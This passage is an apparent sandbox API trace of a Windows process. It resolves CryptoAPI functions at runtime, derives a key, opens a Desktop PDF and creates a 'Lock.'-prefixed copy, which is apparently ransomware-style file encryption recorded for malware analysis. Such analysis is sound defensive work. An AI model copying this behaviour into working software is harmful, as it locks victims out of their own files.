hHeap=0x970000) returned 1 [0144.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0144.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0144.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0144.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0144.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0144.345] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0144.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e50ba8 [0144.345] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e50ba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0144.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0144.345] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0144.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0144.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0144.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b48 [0144.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0144.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0144.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0144.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0144.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0144.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0144.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0144.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0144.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0144.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0144.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0144.346] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87610, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87410) returned 1 [0144.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0144.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0144.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0144.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0144.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0144.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0144.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0144.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0144.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0144.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0144.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0144.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0144.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0144.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0144.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0144.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0144.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0144.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0144.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0144.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0144.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0144.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0144.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0144.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0144.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0144.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0144.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0144.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0144.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0144.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0144.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0144.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0144.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0144.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0144.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0144.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0144.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0144.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0144.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0144.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0144.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0144.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0144.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0144.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0144.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0144.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0144.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0144.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0144.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0144.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0144.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0144.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0144.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0144.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0144.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0144.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0144.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0144.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0144.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977de8 | out: hHeap=0x970000) returned 1 [0144.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0144.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0144.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0144.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0144.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0144.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0144.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0144.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0144.350] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0144.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0144.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0144.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0144.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0144.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0144.351] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0144.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0144.351] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0144.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0144.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0144.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0144.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0144.351] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0144.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0144.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0144.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0144.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0144.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0144.351] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0144.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0144.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0144.351] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0144.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0144.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0144.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0144.351] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0144.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0144.352] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0144.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc70 | out: hHeap=0x970000) returned 1 [0144.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0144.352] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0144.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0144.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0144.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0144.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0144.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0144.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0144.352] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0144.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0144.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0144.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0144.541] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0144.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0144.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0144.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0144.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0144.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0144.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0144.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0144.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0144.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0144.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69b28, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0144.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0144.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0144.543] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0144.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0144.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0144.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0144.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0144.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0144.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0144.543] CryptDestroyHash (hHash=0xa87610) returned 1 [0144.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0144.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0144.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0144.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0144.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0144.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0144.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0144.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0144.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0144.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0144.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0144.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0144.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0144.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0144.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0144.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0144.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0144.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0144.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0144.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0144.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0144.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0144.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0144.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0144.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0144.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0144.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0144.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0144.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0144.544] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0144.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0144.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0144.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0144.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0144.545] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0144.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0144.545] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0144.545] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0144.545] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0144.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0144.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0144.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0144.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0144.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0144.546] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/DH-NxMw2Lrt0X14_j.pdf" (normalized: "c:\\users\\fd1hvy\\desktop\\dh-nxmw2lrt0x14_j.pdf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0144.547] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.547] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0144.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0144.547] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0144.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0144.547] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0144.547] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0144.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0144.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0144.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0144.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0144.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0144.548] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0144.549] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.DH-NxMw2Lrt0X14_j.pdf" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.dh-nxmw2lrt0x14_j.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0144.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0144.729] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0144.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0144.729] PeekMessageW (in: 